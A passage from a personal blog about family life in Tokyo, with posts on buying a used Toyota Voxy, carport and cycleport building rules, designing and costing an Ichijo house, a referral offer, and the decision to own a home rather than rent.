It seems that Mercari is going a step further and will inspect cars sold on their platform, and also help with the name change process and delivery. But they charge a service fee of 210,000 yen for this, so the more DIY options will be cheaper.

Used car dealers

There are companies specialized in selling second hand cars. One can easily search all their stock via sites like CarSensor, Nextage, or Goo-Net.

This is likely a good middle ground: a professional has checked the car, and there might be some warranty as well. However I’m personally concerned about the information asymmetry and misaligned interests: they know much more about the cars than I do, and there is very little stopping them from cheating me. The fact that the then-biggest user car dealer, Big Motor had a major scandal in 2023 also only reinforces this (they allegedly damaged cars to then charge for their repairs).

Official dealerships

Most car maker’s official dealerships sell second hand cars too (e.g. Toyota, Suzuki). We decided to go this route for the peace of mind, and because I think this is where the incentives align the best: the other sellers are mainly interested in getting a good deal at a single transaction, but e.g. if an official Toyota dealership would cheat someone, then that person would likely never buy a Toyota again (and also it could turn into a PR disaster for the company).

Moreover official dealers are also the ones that service most new cars (they upsell people on the maintenance packages), so they know the history of the car. The downside of this is that they will also try to upsell the same maintenance pack when you are buying the second hand car. But this business model of getting people to buy their maintenance packs and to do shaken at their shops also means that they are interested in a long-term relationship which requires happy (or at least not pissed off) customers.

This all costs money, likely making this option the most expensive one. However the cost gets you a few things. In our case they did the followings for free:

oil change
wiper change
battery change
AC cleaning and filter change
brand new SD card for the drive recorder
inside and outside cleaning before showing and before handover
1 year warranty included (and another 2 year warranty added for 7,590 yen)

I didn’t ask about the details of the warranty, but I assume it is on the condition that we regularly service our car at an official dealership, which likely explains the seemingly low price for it.

Car condition rating

Official dealerships also provide a rating on the internal and external condition of the car, listing all damages (including very minor ones).

Our car got the following ratings:

Overall score: 3.5 (out of 6) - “There are some scratches and dents, but it is in relatively good condition”
Exterior: D (from A(best),B,C,D,E(worst)) - “There are some noticeable scratches and dents.” (but nothing that threatens with rust, only cosmetic issues that don’t have to be fixed)
Interior: B (from A(best),B,C,D,E(worst)) - “There is little wear or dirt, and the overall condition is good.” - we couldn’t see any issues at all, it looked like brand new for us

Toyota publishes the meaning of each grade (they call this オールトヨタ統一品質評価制度, All‑Toyota Unified Quality Evaluation System):

Grade	Description
S	Almost brand-new: registered less than 1 year ago, under 10,000 km, virtually no wear.
6	Like-new: under 3 years/less than 30,000 km, flawless with no repairs.
5	Excellent: up to 50,000 km, minor imperfections but no repair needed.
4.5	Very good: under 100,000 km, minor scratches or dents that could be easily repaired to bring up to 5.
4	Good overall: noticeable scratches/dents or rust, but still within reasonable condition.
3.5	Slightly worn: multiple scratches or dents, may need moderate repairs.
3	Noticeably worn: visible damage requiring repairs; may have interior stains or fading.
2	Major wear but still drivable—significantly deteriorated condition.
1	Poor condition: flood damage, modified or used as parts car—generally not suitable for drivers.
RA / R	Repair history: frame or structural repairs—still drivable, but not ideal.

The evaluation goes even further and outlines the places where they identified damages, e.g. for our car:

After seeing the car in person, I would be hard pressed to find even half of these. Things like “golf-ball size dent” and “touch pen marks of less than 10 cm” is just something I wouldn’t even notice, let alone care about. (Also as a family car, I’m sure we will double the number of these damages in a few years time.)

Clicking on a damage will show the details. (Some listings will only provide a pdf listing all damages, some will have this interactive view.)

The nice thing is that this evaluation is available as part of the listing, so you can check all minor damages before seeing the car in person. Also since this is part of an official certificate that the dealer (or another company? not sure) provides, if later there is another defect discovered, that might be covered under warranty. (So it’s not just the sales person telling you that the car is in top condition, but you get an official paper listing out all known damages.)

Same brand different companies

We learned that most dealerships are independent companies, so e.g. if you buy a second hand car in Honda Tachikawa, then you will have to bring it back to that specific shop for check ups and warranty-related issues. Toyota is different: in Tokyo most shops are under the Toyota Mobility Tokyo (トヨタモビリティ東京) brand (owned by a single company), and you can visit any shop for maintenance and warranty. This also affects second-hand car selection: most shops will only sell the ones available at their location, but Toyota Mobility Tokyo will bring you any car from any other Toyota Mobility Tokyo shop for free, if you are interested. (Other brands might have similar setups, but it is worth checking.)

Choosing our family car in Tokyo

2025-07-20T00:00:00+00:00

We recently bought a minivan for our family, living in Tokyo. In this post I’ll cover how we chose the type of car that we bought.

Summary

We have a 1.5 year old, and the second baby is on their way, with a third planned
We wanted sliding doors to help with the kids.
Initially we considered Toyota Roomy/Suzuki Solio, but the storage wasn’t big enough for weekend trips even with one kid
One step up, Honda Freed/Toyota Sienta: we liked the space, but 3 kids would be difficult to fit. Also the third row is too close to the back (safety concern and limited storage), and we were missing some must-have options (parking sensor, AC for the second-third row, captain seat in Sienta)
So in the end we decided to get a minivan, and ended up buying a second hand Toyota Voxy

Phase 1: we don’t need a car

Before we had kids, we were very happy not having to own a car. We regularly rented cars for short trips (once a month or so), but never felt the need to own our own. We also used Times Car fairly often, which further helped when e.g. we wanted to pick up some furniture from IKEA.

Phase 2: okay, we need a car

After our child was born, we found that having a car would be very convenient. We ended up taking taxi quite frequently (e.g. coming home somewhere on a weekend and taking taxi from the station), and also rented cars more and more often.

We also learned that life with a baby can be very unpredictable, and it happened multiple times that by the time we decided that we needed a car for the weekend, the Times Cars were all reserved around us. Also while with 2 adults we could pick up the car together, with a baby it is always one of us getting the car, then picking up the other one and the baby at home (where the childseat is).

New or second-hand

Since we don’t plan on driving everyday, and neither of us have strong opinions about cars, we decided to go with a second hand car to save on the costs. Our idea was to get something around 3-5 years old, when the initial depreciation is already gone, but it still has up to 10 years in it before any major issues would hit.

Phase 3: small car with sliding door

After renting various cars, we quickly learned that sliding door helps a lot with the baby (especially in narrow parking spots). So we started looking for a car with sliding doors. Since our family was only 3 people, we started with the smallest non-kei cars (we excluded kei-cars due to safety concerns, especially on the highway).

This left us with two options:

Suzuki Solio
Toyota Roomy (also sold as Daihatsu Thor)

They both cost around 2-2.5M yen new, and a 5 year old car with the features we wanted (parking camera, adaptive cruse control) was going for 1.2-1.4M yen.

Then we rented a Suzuki Solio for a weekend trip, and that made us change our mind: first of all the storage space was very small. A small suitcase and a folded up stroller could already barely fit, so it felt that any longer trip or more gear (forget about skis) would be impossible to carry. Moreover the seats just weren’t that comfortable compared to other rentals.

At the same time my wife got pregnant, so now we are expecting our second child. We are planning to have 3 kids overall, so this also pointed towards getting a bigger car.

Phase 4: medium-size car with sliding door

We are set on the sliding door, and one size bigger meant these two models:

Toyota Sienta
Honda Freed

Both of these have 3 rows, and 7 seats in 2+3+2 configuration (though Freed is also available in 2+2+2 with captain seats).

These would fit 2 kids comfortably and with ample storage space. Also their 3rd row provides 2 extra seats for guests.

However if we buy a car of this size, it would be nice if it could last long, and with the second baby already on their way, we had to think about fitting 3 kids in 3-4 years time.

ISOFIX and captain seats

ISOFIX is the attachment points where child seats can be installed, and these are usually only available on the 2 side seats of the second row. So thinking about putting 3 kids into the car, two child seats need to go there.

However child seats (especially for infants) are very wide, so putting 2 of them doesn’t leave enough space in the middle for a third kid (though there are intentionally narrower child seats, but we didn’t look into those in detail). But no problem: the third kid can just sit in the 3rd row, right? Except with the 2 child seats fixed in the second row, it is impossible to reach the third row, as neither side of the second row can be flipped forward.

The solution: captain seats. This configuration means that instead of 3 seats in the third row (in a bench setup), the car only has 2 seats (similar to the first row) leaving enough space in the middle to access the third row.

Great! Except captain seats are not available on Toyota Sienta, only on Honda Freed.

Looking for a second hand Honda Freed that fit our requirements we found that it would cost around 2-2.5M yen for a 3-5 year old car with 30-50k km on the clock.

So as the next step we rented a Honda Freed to try it.

The car was great, but with the current summer heat we realized that it is nice to have an AC in the second and third row (instead of having to run the AC in the front at full power). However double AC is an uncommon feature for Honda Freed.

Moreover thinking about 3 kids and how one of them would be sitting in the 3rd row, we started to worry about the safety, since those seats are very close to the back of the car.

This was pushing us towards the idea of starting with a Honda Freed and then changing it to a bigger car once the third kid is born. Then we learned one more thing about Honda Freed: the parking sensor is a paid option, so many second hand cars are missing it. This further pushed us towards getting a full minivan.

Phase 5: let’s just get a mini van

We have rented minivans in the past, and both my wife and I liked driving them, so we started looking for one. The available models that we found were:

Toyota Noah/Voxy (the two are sibling cars, same base and engine, different design)
Nissan Serena
Honda Stepwgn

There are also more luxurious models like Toyota Alphard/Vellfire, but we care neither about the design nor the bigger engine (higher tax), so the higher price ruled them out from the start.

On our rentals we preferred the Toyota Noah/Voxy, so started looking at that first. Searching on the second hand websites, I was surprised how many more Noah/Voxy were available, compared to Honda Freeds. Also the prices weren’t that much higher than the Freed: we could easily find multiple nice options around 2.5M yen (so only about 200-300k higher than a comparable Freed).

Models, trims, and updates

My wife took the deep-dive into the various model refreshes, and different trims of Noah/Voxy. I would find a car that looked like a good deal, and she would point out that it was made right before a trim refresh, so while it was only a few months older, it still had the old tech (including safety system), and that’s why it is cheaper than the one few months younger.

FOr example when we saw a listing like トヨタヴォクシー ZS キラメキ2, we searched for the full name, then checked on the Toyota site about the release date: キラメキ2 was released in 2016 but it was sold until 2020, so you could be looking at a 5 years old car, however the tech inside will be almost 10 years old.

Desired options

In the end we arrived to the following list of options that we wanted to have in the car:

pilot seats in the second row
double AC (dedicated AC for the second row, also cooling the third row)
electric sliding doors on both side
adaptive cruse control

On the condition of the car:

no accident history
non-smoking
one previous owner (it is suspicious if a car went through 2 owners in 3-5 years)

Hybrid or not

Most cars that we considered (including the minivans) are available in hybrid and gasoline versions. We found that for the Toyota Noah/Voxy, the hybrid ones are usually 300-500k yen more expensive than comparable gasoline models.

The ongoing costs of owning a hybrid are lower, with the savings coming from two sources:

Fuel cost (assuming 6,000 km/year, typical for weekend driving): appr. 25,000 yen per year (Hybrid: ~23 km/L vs Petrol: ~15 km/L)
Vehicle tax（自動車税）: 5,500 yen per year (Hybrid: 1.8L → ¥39,500 vs Petrol: 2.0L → ¥45,000)

Bringing the overall saving to around 30,000 yen per year. This means that the higher upfront cost only breaks even after 10-15 years.

There is another consideration: when selling the car after 5-10 years, the hybrid is probably still worth more than the gasoline one. Assuming the car lost half its value by the 7th year, then e.g. 400,000 yen extra for hybrid when buying it, might become 200,000 yen extra when selling. In this case the overall cost of the hybrid for that 7 years would be 200,000 yen more (cost 400,000 yen more, but sold for 200,000 yen more), and if it saved 30,000 yen per year, then the end result is a very comparable financial outcome.

Now if the cost of fuel goes up, then hybrids will do better in the future. But if the car crashes (and we loose any residual value), then the hybrid ends up being worse. Also if we drive more than planned, then hybrids are better, but if we drive less, then gasoline ones come out ahead.

Overall we concluded that hybrid or gasoline models are comparable options, and decided that we will go with the one that fits our other criteria better.

The final choice: Toyota Voxy

In the end we decided to get a gasoline Toyota Voxy: 4 years old with 22,000 km on the clock listed at 2,492,000 yen (but I will write about the real price in another post).

The trim, ZSキラメキ3 was released in October 2020., starting at 3.1M yen. So the first owner might have paid up to 4M yen for it (with options). Considering that we are getting it for 2.5M, the owner likely got around 2M yen max for it, which means that in 4 years they ate a 2M yen depreciation (or in other words, every 10km driven cost them 1,000 yen in depreciation alone). This is why I don’t buy new cars.

In my next post I will talk about the options for buying a second hand car and how we got ours.

Garden structure (carport, bicycle shelter) rules in Tokyo

2025-06-21T00:00:00+00:00

We are building a house in Tokyo. The house design is finalized, and the constructions is ongoing, so we are finalizing the garden design. One common thing to put into the garden is some sort of roof over either a car or bicycles, often referred to as カーポート(carport) and サイクルポート (cycleport). We just learned that there are rules about these.

After starting the house construction, we got a letter from the Building Supervision Department (建築指導課) of the city hall, reminding us that there are rules about building carports and cycleports, and asking us to confirm with them before we build anything. While these structures don’t require explicit building permits (unlikely houses), they still need to follow certain rules and the city hall staff can come and check it later, and could request to demolish a structure that doesn’t follow the rules.

We forwarded the mail from the city hall to our external construction company, and they received the following rules from the city hall.

Everything counts

Essentially by default all structures are considered like the house, so they have to be included in the building area (建築面積) calculations. E.g. our land has a limit of maximum 40% of the land can be covered with a building, and the overall floor space has to be less than 80% of the size of the land. Normally an outside structure (like a garage or shed) would be included in this calculation. Considering that most land are small in Tokyo, the houses are usually pushing very close to these limits (e.g. our house covers 39.3% of the land), which leaves no place for other structures.

The solution: Ministry of Construction Notification No. 1437

There are structures with high degree of openness (高い開放性を有すると認めて指定する構造) that don’t need to be included in the building area calculations, and Ministry of Construction Notification No. 1437 (建設省告示第1437号) defines the conditions for a structure to be classified as such.

The structure has to follow these:

The section without exterior walls must be continuously 4 meters or more in length. (外壁を有しない部分が連続して四メートル以上であること)
The spacing between columns must be 2 meters or more. (柱の間隔が二メートル以上であること)
The ceiling height must be 2.1 meters or more. (天井の高さが二・一メートル以上であること)
The number of floors, excluding basements, must be one. (地階を除く階数が一であること)

For cycleports, #1 and #4 are usually met, however we had to change our cycleport to a different model to meet #2 and #3: our original one was only 2m tall and the distance between the columns was less than 2 m as the colums weren’t at the corners, but at the .25 and .75 points of one long edge.

This led to a situation that due to checking these rules we ended up with a slightly larger cycleport than originally planned (about 10cm deeper and 50cm taller). This came as a surprise, as I thought the city hall will ask us to make it smaller not bigger. But the size is close-enough that the price doesn’t really change, and a taller structure will keep the space feel more open.

Mistakes in online sources

Many online sources (e.g. this) have #2 reversed, saying that the spacing between columns must be less than 2 meters (柱の間隔は２m以下であること). The official document that we got from our city hall (which is the same as the one from the ministry’s website) clearly says that it’s more than 2m (柱の間隔が二メートル以上であること), so I think the other online sources are likely wrong. But just in case, it is better to double check with your local city hall, since there could be different rules for different areas, and the city hall will know the rules that apply to your land.

Designing our house

2025-05-26T00:00:00+00:00

We recently wrapped up the design of our house. I will share how it went in this post.

Before meeting with the architect

This is different by house maker, but Ichijo only lets you meet with their architect once you bought the land. This makes sense: lands in Tokyo are usually small, so it is rare that a house designed for one land will fit another one. So while we were choosing the land, we only worked with our sales guy from Ichijo. He prepared some reference layouts, but as we later realized they were more for visualizing the size of the house, as most of them would have failed the earthquake resistance rules (e.g. having too wide open spaces, putting a door too close to the corner). They were still helpful, but the architect didn’t even consider them when starting the design.

May 7: we closed on the land

We closed on our land on May 7th. Officially we were only allowed to enter the land from this point, so after this date Ichijo went and measured the land. This didn’t change anything for us, as the previous owner already measured it (after taking down the old house and splitting the land into two), but if the land was sold with an old house on it, it can happen that the size of the land was last measured when the old house was built, and might be incorrect affecting the size of the new house.

Initial schedule

We met with our architect on June 6th for the first time. He collected our requirements, wishes, and ideas, and outlined the following schedule (he asked for 2-3 weeks between the steps, and then we agreed on the exact dates):

June 6: First planning meeting (初回プラン打合せ)
June 26: Basic plan (基本プラン)
July 10: Electrical and lighting meeting (電気・照明打合せ) - final deadline: November 28
August 9: Final specification meeting (最終仕様打合せ)
August 26: Consent to start construction (工事着手承諾) - final deadline: January 12

Due to Ichijo’s backlog of houses, our actual deadline for the electrical and lighting meeting was November 28, and the Consent to start construction had to be signed by January 12. If these deadlines are met, then the construction would go as follows:

Mid March: groundbreaking ceremony (地鎮祭)
End of March: construction starts (着工)
Mid May: walls and roof done (上棟)
End of August: moving in (お引渡)

This schedule assumes that we mainly accept the first plan he comes up with, and only make a few minor modifications. The extended deadlines gave an additional 4 months of leeway, but in the end we asked for an additional extension of 2 months, pushing out all the construction dates by that. This extension didn’t cost anything extra (other than the additional 2 months of rent we need to pay at our current place).

With the 2 months delay our final schedule looked like this:

June 6: first meeting - discussing our requirements and ideas
June 26: 1st layout - living room on the first floor as we asked. Outside shape of the house is already the same as the final one. Requested bunch of changes
July 10: 2nd layout - many of the changes ended up worse than original, so reverted them. Made other requests (e.g. move bathroom to the 2nd floor)
July 22: 3rd layout - bathroom didn’t work on the 2nd floor, so asking to move it back.
August 9: 4th layout
August 26: 5th layout
September 12: 6th layout, finalizing details (like window sizes and stronger walls)
September 26: 7th layout. It feels that we are getting the most out of the space, but the kitchen-dining-living spaces feel too cramped
October 17: 8th layout. Can we move the living-dining-kitchen to the second floor? This restarts much of the designing.
October 24: 9th layout. Second floor living-dining-kitchen works much better, every starting to come together
November 13: 10th layout. Started working with the lights and electrical stuff. Layout is mostly fixed
November 28: 11th layout. Slowly finalizing the minor details.
December 9: 12th layout. Almost there, finalizing lights.
January 9: 13th layout. We spent New Years with the in-laws, and they pointed out that the kitchen is only about 2m away from the toilet door. We spent the rest of the holiday coming up with new layouts until we found one that was the best, and shared it with the architect on January 9.
January 23: 14th layout, based on our new idea. Works really well.
February 7: 15th layout. Still figuring out the kitchen counter a bit, and moving some doors, but the walls are the same as in the final design. Meanwhile working hard to finalize all the electrical stuff (as we kept changing the layout until now and we care about lights). We had two sessions with a lighting designer to get advice. (I wrote about the lights here.)
February 19: 16th layout, final meeting to confirm everything. Usually at this point only minor changes are made, but we make like 200 requests (including adding a new window to the bathroom, and redefining the floorheating zones).

This concluded the design phase, and we are looking at a construction schedule of:

Mid May: groundbreaking ceremony (地鎮祭)
End of May: construction starts (着工)
Mid July: walls and roof done (上棟)
Early November: getting the keys

Dragging out the design phase this long is uncommon, but overall I’m happy that we did it. With each iteration we got closer to a better use of the limited available space, and I’m confident that we are getting the most out of what we have. We were very lucky that both Ichijo’s sales guy and our architect were totally cool with our process taking longer than usual, and supported us throughout this extremely patiently.

Rules, rules, rules

As we started the design, we quickly realized that there are a lot of rules that one has to follow.

Building laws

There are restrictions on the size, and shape of the building that are written in law. These depend on the city and the zoning of the land. For us the main ones were the following:

maximum 40% of the land can be covered with a house
floorspace of the house is maximum 80% of the size of the land
minimum 50 cm between the outside of the wall and the edge of the land
don’t block the sun from your neighbor to the North (北側斜線制限, see below)

The first two means that for a 120 m2 land you can build a 2-story house with overall max floorspace of 96m2. These two percentages are one of the main information that people check when looking for a land as it defines the size of the potential house, and it depends on the zoning of the area. The 40/80% is pretty common for low-rise residential areas (lot of single-family homes, but most places will have a few 2-story apartment buildings with small, 1-room apartments as well).

‘Don’t block the sun from your neighbor’ regulation 北側斜線制限

With houses built very close to each other, Japan wants to ensure that every house gets some amount of sun. Most of the sun comes from the South, so the North side of the houses are required to stay under a ~45 degree plane in order to let their neighbor to the North get enough sun.

Our land is long in South to North direction, so this affects how close the house can be moved to the North side (back of the land). Also as the land is not exactly South-North, but about 15 degree off, so the rule applies to the West side too (as it is technically West-NorthWest). This resulted in the West edge of the second floor have a sloped ceiling. The lowest point of this is 170 cm, and we put the stairs under it, where it doesn’t matter that much. These types of sloped ceilings are pretty common in Tokyo.

These rules are non-negotiable (the house won’t get the building permit if any is violated), so they don’t depend on the builder company.

Rules of earthquake resistance

The next type of rules are to ensure the house won’t collapse in case of an earthquake. Things like:

maximum size of open spaces
big living room having to have a ~1 m long wall coming in from the side in the middle

These depend on the builder for multiple reasons:

material of the house: steel frame is stronger than wood (Ichijo uses wood)
targeted earthquake resistance rating (Ichijo targets a pretty high grade)

So working with Ichijo made these rules more of an issue for us, but other than having to add an extra small wall in the living room, it was fine in the end.

Rules of the builder

Then there are the rules of the house builder.

Semi-order and full-order houses

Some companies have semi-order and full-order houses, where the latter is more expensive, while the former restricts the outside shape of the house to one from their set of designs. Luckily Ichijo wasn’t like this, and they let us build the house in any shape.

Size of a section of wall

As the houses are mainly built from wood, the walls consist of pillars and space between the pillars (filled with insulation). Usually this unit of pillar-space-pillar has a pre-defined size, and the wall has to be a multiple of this. The most common size for this is 1マス which is a square of 3尺（910mm）× 3尺（910mm）. So all walls have to be multiples of 91 cm.

Ichijo also allows wall sections of half this size, so in practice you can have walls of multiples of 45.5 cm. This limitation is less visible in bigger rooms, but pretty much decides the width of corridors, stairs, and toilets.

Some builders offer 100 cm unit instead, which however means that more space is wasted on corridors, stairs, and toilets (or more spacey corridors, stairs, and toilets, depending on how you look at it).

Central air circulation system (ロスガード)

This system is one of the selling points of Ichijo. It is mandated by law to provided sufficient air circulation in the house, which often means an air intake in each room where outside air can come in. This makes all heating and cooling systems having to run stronger, as outside air keeps coming in.

Ichijo’s solution to this is a central air circulation system that sends and collects air from each room via pipes, and then makes the incoming and outgoing air pass next to each other exchanging heat. They claim a 90% heat exchange efficiency.

This is all great, but finding a place for the central unit for this system was a major headache, as it has many rules:

The unit takes up one square (91x91 cm)
It has to be on the second floor, next to an outside wall
The wall can’t be sloped (ruling out one of our walls)
In front of it there has to be an empty square (as the door of the system needs to be opened for maintenance), and this square has to have at least one side open (no door or wall on at least one side)

It took a lot of work to find a place for this where it is not in the way, but still follows all these rules.

Summary

Those were most of the rules of designing the house. Our architect was excellent at knowing about these and guiding our design to ensure we follow them. However He was less strong in suggesting us good design ideas. Apart from the initial design, he mainly waited for us to come up with ideas, and then he would work those into the layout.

Towards the end of the design we were running out of time, and were also slightly frustrated with the lack of advice about design (e.g. about lights). So we consulted with a freelancer lighting advisor and had a one hour call with him twice. These were super helpful. He had a lot of concrete advice, and he worked with us on figuring out what works for our design. I can highly recommend him. (He does not speak English though.)

Things we would do differently next time:

hire an additional architect or interior coordinator to advice on the design. Probably a freelancer like the lighting advisor would be enough
bring concrete layout ideas from the early meetings, instead of just telling our opinions about the layout. It could have saved a lot of back-and-forth, as e.g. we thought about moving the bathroom to a different floor, architect comes back in 3 weeks, shows the design, it just doesn’t work there, so we ask to revert it. By the end of the design phase, we were coming up with layouts ourselves, and that allowed a much faster iteration on ideas, letting us only bring more polished ideas to the architect

This post focused mainly on the process of designing our home. I have written separate posts about the design itself and about the lights.

Ichijo friend referral

2025-05-24T00:00:00+00:00

Ichijo, as most major house makers, offer a friend referral system.

If someone who has built a house with Ichijo introduces you before you visit their showroom, and later you build a house with Ichijo, then you will receive a discount (up to 320,000 yen), while the referring person also receives some Ichijo-points (One can use these points to buy things from Ichijo, like replacement filters for the central air system).

As we are building our house with Ichijo, I’m happy to submit a referral for you. If you are interested, please fill out this Google Form.

By submitting this form, you request me, Mark Szabo (https://szabo.jp) to submit the provided information to Ichijo (株式会社一条工務店) as a referral. After the referral is submitted, I will delete the provided information on my end. Ichijo will handle the information in accordance with their privacy policy: https://www.ichijo.co.jp/privacy/

Doing this also supports this blog, so thank you very much.

If you have already visited an Ichijo showroom, you may still submit the form, however in that case you won’t be eligible for the discount, but I will still receive some Ichijo-points. If you found this blog useful, this is an easy way to support it.

If you have any question, reach out to me on: ichijoreferral@szabo.jp

Other house maker companies

If you are interested in any other big house maker companies, I highly recommend finding someone to introduce you to them (e.g. ask around among friends, post to #random on the company Slack), as it is beneficial for both you and the referring person.

Why we chose to own our home instead of renting

2025-05-20T00:00:00+00:00

Back in January 2023 I wrote a post on the renting vs buying decision in Tokyo concluding that the two options have comparable financial outcomes (assuming the renter invests the additional money into a diversified portfolio). Yet we decided to build our house. In this post I’ll share the reasons that contributed to this decision.

For a family, it is hard to find a big enough place to rent

The largest rentals in our area are mostly 3LDK (3 bedrooms, one big living-dining-kitchen), which might be enough for a family with one kid (or a family with 2 kids where none of the parents work from home), but if one wants more than 2 kids, or 2 kids and a remote working parent, then it starts to get small.

Quality of rentals is often low

We found that when people build or renovate with the intention of renting it out, they often focus on reducing costs. This results in cheap air conditioners and stoves, missing floor-heating and dishwasher, etc. In case of houses, also low quality builds (bad insulation both against heat and noise, low quality flooring that get damaged easily). These don’t only contribute to higher utility bills, but also significantly impact our quality of life. We had a place where it was super cold in the morning in winter, but if we turned on all the ACs, then we could use the microwave as that would trip the breaker. This is not how I want to live my mornings.

We have seen well built rentals, but they were usually built for the owner themselves, and were only rented out as the owner had to move away for a few years (usually due to work). However this means that the rental contract is only for those few years until the owner is away, meaning one can’t stay long term. Moving is expensive and time consuming (including finding a new place).

Moving gets harder with kids

One of the main benefit of renting is the flexibility of moving (e.g. if there is a good job opportunity or if one needs more or less space). However if one has kids, then as kids start to go to school, moving becomes harder, as it will either limit the location to the same school district (so that kids can stay in the same school), or kids will have to switch schools.

Now whether this is a major issue or not comes down to personal preference, but I had to switch schools when I was 10 due to my parents’ work, and I did not take it well. So it is important for me to let my kids go to the same school (as long as they want to).

Less worry about damages

Again with kids it is inevitable that there will be damages, heavy things dropped on the floor, food and drawings on the walls, etc. These are more costly to fix in rentals, as most landlords prefer professional repairs over DYI solutions, which adds stress to the situation. Even if one doesn’t care about the damage itself, if it is big enough that it risks the landlord withholding the 1-2 months worth of deposit, it can easily make the problem seem bigger than what it ought to be.

More customization options

Owing, especially building our own, gives us the option to customize more. We get to have a front-open big dishwasher, smart home, and a small office for remote work. We can choose the best insulation, floor heating in all rooms, high-grade ACs, self-cleaning bathtubs, and solar panels.

DIY opportunities

Owing also provides the opportunity to do DIY, which I greatly enjoy. In rentals we had minor issues a few times (e.g. a sink leaking) where I could have likely fixed it myself, but as there is a chance I break something, it was safer to call the landlord, even if it meant that we had to wait a few days. But this is a personal preference again: I genuinely enjoy fixing these things myself, while I know many people would rather have someone else take care of them.

Summary

Overall for us owning a home seem to provide a better quality of life for only slightly higher costs (current rent is 240,000 yen, current expected mortgage is 290,000 yen), which is essentially why we decided to own our home in the end.

The cost of our Ichijo house

2025-05-04T00:00:00+00:00

We are building a house in Tokyo with Ichijo 一条工務店. In a previous post I covered the costs associated with buying the land, and in this post I’ll talk about the cost of our house built by Ichijo. There will be additional fees (e.g. garden, registration, etc.) that I will write about in a separate post once we move in. This post is only about the money we pay to Ichijo for the building itself.

Overview

The final cost of the house was 35,605,326 yen (32,368,479 yen plus the 10% tax). All prices from this point will be without tax (as that’s how they are shown in the estimate).

Category (jp)	Category (en)	Cost
Ⅰ 建物本体工事御見積書	Main building construction	22,165,367 yen
Ⅱ 建築申請・その他業務諸費用	Subsidy applications	794,000 yen
Ⅲ 付帯・屋外給排水・雨水排水・浄化槽・ガス配管工事御見積書	Outdoor water plumbing work	1,583,700 yen
Ⅳ 標準仕様外工事御見積書	Various options that we chose	6,515,112 yen
Ⅴ 太陽光発電システム御見積書	Solar panel and battery	1,310,300 yen
建物工事費合計(税抜)	Total building construction cost (excluding tax)	32,368,479 yen

I will break down each of these categories now.

Main building construction - 22,165,367 yen

This depends on the size of the house, the chosen line-up (GRAND SMART in our case), whether the house has to have a high fire resistance (some areas require this), and when the contract was signed.

Before we signed our contract in January 2024, these were the per tsubo prices for each line-up:

Now, there is a small note on the top left corner: these prices apply for a 30 tsubo (99 m2, 1 tsubo is 3.3 m2) house outside the 23 wards of Tokyo, without special fire resistance, tax included. If the house is smaller, then the per-tsubo price goes up slightly.

Our house is 95.44 m2 (29 tsubo) and we paid 232,244 yen per m2 (766,405 yen per tsubo) for this. Adding the 10% tax to this, the per-tsubo price ends up being 843,046 yen, which is slightly higher than the advertised 823,000 yen. This is likely due to the slightly smaller house, and the time difference (the prices are from November and we signed the contract in January).

During the design phase we considered switching to a cheaper line-up (i-smart), but many of the options that we wanted and were included with GRAND SMART were paid options with i-smart, so in the end we decided to stay with GRAND SMART as the savings would not have been significant.

Subsidy applications - 794,000 yen

Ichijo builds high quality houses with great insulation, so they are eligible for many local and national subsides. Ichijo handles the paperwork to apply for these, but they charge extra for this (however the subsidies should more than offset this cost).

For us they will apply for the followings subsidies:

Name of the subsidy	Application fee
確認申請･設計住宅性能評価･低炭素申請手続及び諸費用	499,000 yen
東京ｾﾞﾛｴﾐ住宅申請費用	210,000 yen
子育てグリーン住宅支援事業	85,000 yen
Overall	794,000 yen

This is a lot, but we are expected to get somewhere between 2 to 3 million yen from the subsidies, so it should work out in the end.

Outdoor water plumbing work - 1,583,700 yen

This is to cover plumbing work outside the house, connecting the house to the water pipe already in the land. Our land was created by halving a bigger land, and the other half got both the existing water and the gas connections, we will have to pay for connecting the land to the water pipes separately (we won’t have gas in the house, so won’t connect that).

Item (jp)	Item (en)	Cost
仮設工事	Temporary Construction	721,000 yen
屋外給水設備工事	Outdoor water supply installation work	219,000 yen
屋外排水設備工事	Outdoor drainage system construction	280,900 yen
特別運搬費	Special transportation fee	42,000 yen
残土処分費	Surplus soil disposal costs	139,000 yen
屋外雨水設備工事	Outdoor rainwater installation work	181,800 yen
合計	Overall	1,583,700 yen

Connecting the land to the water pipes will be an additional 1,223,035 yen (tax included), but that is done by a different company, so it is not included in the Ichijo estimate.

Some of this might be due to local regulations (I remember that we have to install a tank for rain water due to a local law, so it might be different elsewhere).

Options that we chose - 6,515,112 yen

This is the biggest additional expense to the house, and where we could have both reduced or increased the costs significantly. In the end we got 63 different options, so I will naming some minor ones, and organize them into the following categories.

Category	Cost
Custom kitchen and cupboard	1,859,500 yen
Equipment upgrades	1,579,000 yen
Walls, floors, and windows	859,900 yen
Smart home	661,080 yen
Things we didn’t ask for	597,300 yen
Lights and electrical stuff	467,832 yen
Storage and laundry poles	413,700 yen
Others	76,800 yen

Custom kitchen and cupboard - 1,859,500 yen

I already covered this in an earlier post, but TLDR: we wanted a big, front-open dishwasher, and didn’t really like Ichijo’s kitchen’s design, so ended up getting both the kitchen and the cupboard from WoodOne.

Equipment upgrades - 1,579,000 yen

The base price includes the default equipments (ACs, toilets, water taps, etc.), but we chose to upgrade some of them. For the living room AC this was mandatory in order to qualify for some of the energy efficiency subsidies, the rest was mostly our choice.

Item	Price	Details
Air conditioner upgrade	565,000 yen	This includes high-grade Daikin ACs in all rooms.
Sink at the entrance from WoodOne	366,000 yen	We added an additional sink near the entrance, which would have been an extra option from Ichijo anyway, so we got it from WoodOne, as we preferred their design. (We chose the open-type, but they have unit-type too.)
Upgrade both toilets to one that opens automatically and easier to clean	176,000 yen	Considered Toto’s Neorest a lot, but ended up going with the cheaper Toto GG3 as we didn’t find any feature that would justify the double price of Neorest.
Honeycomb shades at most windows	159,000 yen	Instead, or in addition to curtains, we added these shades. We had some special discount making these cheaper, but added electric motors to all.
Add automatic cleaning functionality to the bathtub	130,000 yen	We give our baby a bath everyday, so this will save about 5 minutes of work each day.
EcoCute water heater upgrade to high-power, 460 liter model	90,000 yen	Our bathroom is on the second floor, so we wanted the high power model to ensure good water pressure.
Sink with motion sensor tap in the second toilet (first floor)	73,800 yen
Washing machine facet upgrade, to include hot water	19,200 yen	The default one only has cold water and we might get a washing machine that will need both.

Walls, floors, and windows - 859,900 yen

Walls, floors, and windows are mainly part of the base price (as they are what makes a house a house), but of course we added some extra options.

